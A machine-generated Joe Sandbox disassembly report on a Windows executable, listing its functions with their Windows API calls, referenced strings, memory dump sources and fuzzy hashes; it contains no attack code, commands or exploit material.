                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                        Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_memmove_wcslen
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 369157077-1007645807
                                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                        Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32 ref: 00445BF8
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 3125838495-3381328864
                                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                        Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CharNext
                                                                        • String ID:
                                                                        • API String ID: 1350042424-0
                                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                        Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 3052893215-2127371420
                                                                        • Opcode ID: 036da06a49ec39ef49fd599b726bde4f16b1b0d6ce0cde1bf1ad5f3ef79650c7
                                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                        • Opcode Fuzzy Hash: 036da06a49ec39ef49fd599b726bde4f16b1b0d6ce0cde1bf1ad5f3ef79650c7
                                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                        Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2295938435-2354261254
                                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                        Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 3038501623-2263619337
                                                                        • Opcode ID: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                        • Opcode Fuzzy Hash: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                        Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2295938435-8599901
                                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                        Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00443B67
                                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                        • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                        • IsWindow.USER32(?), ref: 00443C3A
                                                                        • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1834419854-3405671355
                                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                        Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 455036304-4153970271
                                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                        Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                        • String ID:
                                                                        • API String ID: 2170234536-0
                                                                        • Opcode ID: fca5502848a94a34e829829590c764bfc6032a7ef4af3b654157ba1b990b1e8c
                                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                        • Opcode Fuzzy Hash: fca5502848a94a34e829829590c764bfc6032a7ef4af3b654157ba1b990b1e8c
                                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                        Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                        Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
